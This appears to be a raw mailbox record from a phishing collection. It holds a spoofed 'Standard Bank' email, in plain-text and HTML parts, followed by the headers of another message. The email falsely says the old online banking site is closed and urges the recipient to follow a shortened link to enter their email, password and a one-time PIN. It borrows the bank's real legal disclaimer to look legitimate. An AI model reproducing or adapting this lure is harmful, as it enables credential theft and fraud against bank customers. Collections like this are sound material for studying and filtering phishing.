From: Standard Bank <ibsupport@standardbank.co.za>
Date: Mon, 13 May 2019 22:17:31 -0700
Message-ID: <b32960d9-84a8-4bd8-a4d7-9a9e05e54c2e@egmex01.egmine.local>
Return-Path: ibsupport@standardbank.co.za
Received-SPF: TempError (egmex01.egmine.local: error in processing during
 lookup of ibsupport@standardbank.co.za: DNS timeout)
Status: O
X-Status: 
X-Keywords:                  
X-UID: 111

--===============0031537857==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   =

   =

    =

   14 May 2019 =

Good day  =

 We have reached our digital NEXT, and the old Online Banking site has been=
 discontinued. Experience the new Online Banking site with a two-step sign =
in feature.
 =

 Click Here to sign in and Upgrade, you will be required to first enter you=
r email address and then your password on the next screen.
  =

 Registered phone number we have on our record must be confirmed as we will=
 verify by sending One-Time-PIN to validate your details.

   =

  =

 =

    	  	  =

   	 The small-but-very-important print:

Everything in this email and any attachments relating to the official busin=
ess of Standard Bank Group Limited is proprietary to the group. It is confi=
dential, legally privileged and protected by law. We do not own and endorse=
 any other content. =


The person addressed in the email is the sole authorised recipient. Receive=
d it by mistake? Please notify the sender immediately and do not read discl=
ose or use the content in any way. =


Remember, we will never send you any communication asking you to update or =
provide confidential information about you or your account. If there=2019s =
anything strange about this email or other emails you receive claiming to b=
e from Standard Bank, please forward it to phishing@standardbank.co.za and =
we=2019ll take it from there. =


We also cannot assume the integrity of this communication has been maintain=
ed or that it is free of errors, virus, interception or interference. You c=
an read more about our privacy policy on our website at www.standardbank.co=
.za

Copyright Standard Bank Group Limited. All rights reserved. =

The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). We are=
 an authorised financial services provider and registered credit provider (=
NCRCP15). =


Moving Forward is a trademark of The Standard Bank of South Africa Limited


--===============0031537857==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><P>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D640 align=3Dcenter border=3D=
0>
<TBODY>
<TR>
<TD><IMG id=3D1556849887310170001_imgsrc_url_0 class=3Dx_-630654243yiv28386=
67117CToWUd style=3D"FONT-FAMILY: Arial; COLOR: rgb(255,255,255); PADDING-B=
OTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT=
: 0px" src=3D"https://ecp.yusercontent.com/mail?url=3Dhttps%3A%2F%2Fci3.goo=
gleusercontent.com%2Fproxy%2FBBJ3KhTwPQhXxfCITBetLlCN7aAjFp3Drfx7r4grIWF3vK=
lGov9Dqz_VMkUpyLIOMjAuY-4akD3hFyI5yIioyK3w2Vsr_imlYoBUN4qqfihftkuSAZkZxS1ye=
UlT6vwZ-js%3Ds0-d-e1-ft%23http%3A%2F%2Fsbgmobile.standardbank.co.za%2Fstand=
img%2FSBGMobileApp%2FImages%2Fheader-600.png&amp;t=3D1556849425&amp;ymreqid=
=3D49d2a34d-1790-cbff-1c2b-600000012900&amp;sig=3DAXcFq1YFP8XZRsQ1F8Cpdg--~=
C" width=3D600 height=3D70></TD></TR>
<TR>
<TD bgColor=3D#ffffff>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D580 align=3Dcenter border=3D=
0>
<TBODY>
<TR>
<TD>&nbsp;</TD></TR>
<TR>
<TD bgColor=3D#ffffff>
<P><FONT color=3D#333333 size=3D2 face=3DArial><STRONG>14 May 2019&nbsp;<BR=
></STRONG></FONT><FONT color=3D#333333 size=3D2 face=3DArial><STRONG>Good d=
ay&nbsp; </STRONG></FONT></P>
<P><FONT color=3D#333333 size=3D2 face=3DArial><STRONG>We <SPAN class=3Dx_-=
630654243yiv2838667117il>have</SPAN> reached our digital NEXT, and the old =
Online Banking site has been discontinued. Experience the <SPAN class=3Dx_-=
630654243yiv2838667117il>new</SPAN> Online Banking site with a two-step sig=
n in feature.</STRONG></FONT></P>
<P><FONT color=3D#333333 size=3D2 face=3DArial><STRONG></STRONG></FONT></P>
<P><A href=3D"http://x.co/runit" rel=3Dnofollow target=3D_blank>Click Here<=
/A> to sign in and Upgrade,&nbsp;<SPAN class=3Dx_-630654243yiv2838667117il>=
you</SPAN> will be required to first enter your email address and then your=
 password on the next screen.</P>
<P><FONT color=3D#333333 size=3D2 face=3DArial><STRONG></STRONG></FONT>&nbs=
p;</P>
<P><FONT color=3D#333333 size=3D2 face=3DArial><STRONG>Registered phone num=
ber we <SPAN class=3Dx_-630654243yiv2838667117il>have</SPAN> on our record =
must be confirmed as we will verify by sending One-Time-PIN to validate you=
r details.</STRONG><STRONG></STRONG></FONT></P></TD></TR>
<TR>
<TD>&nbsp;</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD><IMG id=3D1556849887310170001_imgsrc_url_1 class=3Dx_-630654243yiv28386=
67117CToWUd alt=3D"" src=3D"https://ecp.yusercontent.com/mail?url=3Dhttps%3=
A%2F%2Fci6.googleusercontent.com%2Fproxy%2FDXWnY1YPguUbbhGEQU2ykj-65DSegUjJ=
VdirZ7xhIj-V8yIRcVdiXM5HV9Qfm-rjpQezt3rk9E7zDlYvmJO0YTxoD7RtHoX9Q2rLljntO2u=
XMDGEbwS1FNlBjCA-ZwE02xa_fDyIkI0PlkAacMVQqbkmWz1-QD5KfYPaAuAwJwg06Fq6%3Ds0-=
d-e1-ft%23http%3A%2F%2Fwww.standardbank.co.za%2Fstatic_file%2FCampaigns%2FS=
tudio%2Fonline2018%2FGMS-5098%2FGMS-5098---Small-Enterprise_03.jpg&amp;t=3D=
1556849425&amp;ymreqid=3D49d2a34d-1790-cbff-1c2b-600000012900&amp;sig=3DMWJ=
ixlwOkUlavA4beyxnsw--~C" width=3D640 height=3D54></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D640 align=3Dcenter border=3D=
0>
<TBODY>
<TR>
<TD bgColor=3D#f0f0f0 width=3D30>&nbsp;</TD>
<TD bgColor=3D#f0f0f0 width=3D580>&nbsp;</TD>
<TD bgColor=3D#f0f0f0 width=3D30>&nbsp;</TD></TR>
<TR>
<TD bgColor=3D#f0f0f0>&nbsp;</TD>
<TD bgColor=3D#f0f0f0 align=3Dleft><FONT color=3D#666666 size=3D-3 face=3DA=
rial><STRONG>The small-but-very-important print:</STRONG><BR><BR>Everything=
 in this email and any attachments relating to the official business of <SP=
AN class=3Dx_-630654243yiv2838667117il>Standard</SPAN> <SPAN class=3Dx_-630=
654243yiv2838667117il>Bank</SPAN> Group Limited is proprietary to the group=
. It is confidential, legally privileged and protected by law. We do not ow=
n and endorse any other content. <BR><BR>The person addressed in the email =
is the sole authorised recipient. Received it by mistake? Please notify the=
 sender immediately and do not read disclose or use the content in any way.=
 <BR><BR>Remember, we will never send <SPAN class=3Dx_-630654243yiv28386671=
17il>you</SPAN> any communication asking <SPAN class=3Dx_-630654243yiv28386=
67117il>you</SPAN> to update or provide confidential information about <SPA=
N class=3Dx_-630654243yiv2838667117il>you</SPAN> or your account. If there=
=E2=80=99s anything strange about this email or other emails <SPAN class=3D=
x_-630654243yiv2838667117il>you</SPAN> receive claiming to be from <SPAN cl=
ass=3Dx_-630654243yiv2838667117il>Standard</SPAN> <SPAN class=3Dx_-63065424=
3yiv2838667117il>Bank</SPAN>, please forward it to <A rel=3Dnofollow>phishi=
ng@standardbank.co.za</A> and we=E2=80=99ll take it from there. <BR><BR>We =
also cannot assume the integrity of this communication has been maintained =
or that it is free of errors, virus, interception or interference. <SPAN cl=
ass=3Dx_-630654243yiv2838667117il>You</SPAN> can read more about our privac=
y policy on our website at <A href=3D"https://deref-mail.com/mail/client/Tg=
9oaWzVrTc/dereferrer/?redirectUrl=3Dhttp%3A%2F%2Fencrypt-track6.standardban=
k.co.za%2Fw%2Ftrack%2Fca6pH01fMjKzMLG0MLa0ZDcxMLYwZmcHAAAA__8PQ7KDCVG" rel=
=3Dnofollow target=3D_blank>www.standardbank.co.za</A><BR><BR>Copyright <SP=
AN class=3Dx_-630654243yiv2838667117il>Standard</SPAN> <SPAN class=3Dx_-630=
654243yiv2838667117il>Bank</SPAN> Group Limited. All rights reserved. <BR>T=
he <SPAN class=3Dx_-630654243yiv2838667117il>Standard</SPAN> <SPAN class=3D=
x_-630654243yiv2838667117il>Bank</SPAN> of South Africa Limited (Reg. No. 1=
962/000738/06). We are an authorised financial services provider and regist=
ered credit provider (NCRCP15). <BR><BR>Moving Forward is a trademark of Th=
e <SPAN class=3Dx_-630654243yiv2838667117il>Standard</SPAN> <SPAN class=3Dx=
_-630654243yiv2838667117il>Bank</SPAN> of South Africa Limited</FONT></TD><=
/TR></TBODY></TABLE></P></BODY></HTML>
--===============0031537857==--

From jose@monkey.org Tue May 14 07:46:01 2019 +0000
Return-Path: admin@mbabm.uz
Delivered-To: jose@monkey.org
X-FDA: 75486400122.16.songs99_8bcdfeeea9a1e
X-Spam-Summary: 50,0,0,a801d672fb1c2296,d41d8cd98f00b204,admin@mbabm.uz,:,RULES_HIT:41:72:355:375:379:495:800:962:967:969:973:983:988:989:1021:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1436:1437:1513:1515:1516:1517:1521:1533:1534:1542:1588:1589:1593:1594:1711:1714:1730:1747:1777:1792:2393:2525:2527:2560:2563:2682:2685:2828:2859:2895:2933:2937:2939:2942:2945:2947:2951:2954:3022:3038:3138:3139:3140:3141:3142:3586:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:5007:6114:6117:6119:6261:6642:6650:6703:7809:8518:8599:8603:8885:8957:8987:9025:9080:9388:9468:9908:10004:11473:11658:11914:12043:12114:12555:12740:12764:12895:12903:12955:12958:12967:12986:13025:13139:13439:13975:14093:14096:14181:14721:14849:18000:21080:21433:21451:21483:21524:21554:21627:21740:21810:21819:30070,0,RBL:195.158.18.164:@mbabm.uz:.lbl8.mailshell.net-62.2.235.100 64.100.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules
X-HE-Tag: songs99_8bcdfeeea9a1e
X-Filterd-Recvd-Size: 3078
Received: from mail.mbabm.uz (mail.mbabm.uz [195.158.18.164])
	by imf13.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 14 May 2019 07:46:00 +0000 (UTC)
Received: from mbabm.uz (unknown [129.56.23.18])
	by mail.mbabm.uz (Postfix) with ESMTPA id D919E200C2766
	for <jose@monkey.org>; Tue, 14 May 2019 12:44:49 +0500 (+05)
